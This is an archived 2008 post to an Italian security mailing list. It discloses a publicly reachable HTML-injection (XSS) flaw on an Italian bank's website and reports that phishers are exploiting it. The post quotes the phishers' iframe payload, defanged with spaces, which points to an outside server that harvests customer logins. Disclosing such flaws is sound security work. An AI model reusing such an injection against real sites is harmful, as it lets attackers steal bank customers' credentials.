[ Home | Liste | F.A.Q. | Risorse | Cerca... ]


[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]


Archivio: Gennaio 2008 ml@sikurezza.org
Soggetto: [ml] incredibile buco di fideuramonline.it
Mittente: Marco d'Itri
Data: Mon,  7 Jan 2008 21:51:51 +0100 (CET)
Avevo segnalato la cosa un mese fa a tutti i contatti che avevo trovato
ma non ho avuto risposta, oggi ho tentato altre strade per contattarli
ma visto che visto che nel frattempo è intervenuta Spamhaus non c'è più
motivo di cercare di tenere la cosa riservata...
Se qualcuno conosce qualcuno che potrebbe capire la situazione magari lo
avverta.

http://www.spamhaus.org/sbl/sbl.lasso?query=SBL62371

In pratica il sito ha una funzione accessibile pubblicamente per
inserire HTML arbitrario all'interno delle sue pagine HTTPS, XSS by
design. Chiunque abbia minime conoscenze di programmazione può intuire
come funziona guardando l'URL...

Questa vulnerabilità viene attivamente sfruttata dalla solita banda di
phisher "HELO User" per inserire un iframe che punta al loro sito e
permette di raccogliere i dati inseriti dai clienti, che ragionevolmente
non si aspettano che il sito della propria banca correttamente
verificato con SSL in realtà invii i dati inseriti a un server
taiwanese:

<I F RAME SRC="ht tp://su n.c oma ll.t w/
 script/LoginServlet.php?function=login" width=800 height=800
 scrolling="no" frameborder="0"></IFRAME>

Anche il sito dell'iframe è sempre lo stesso da un mese.

-- 
ciao,
Marco




[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005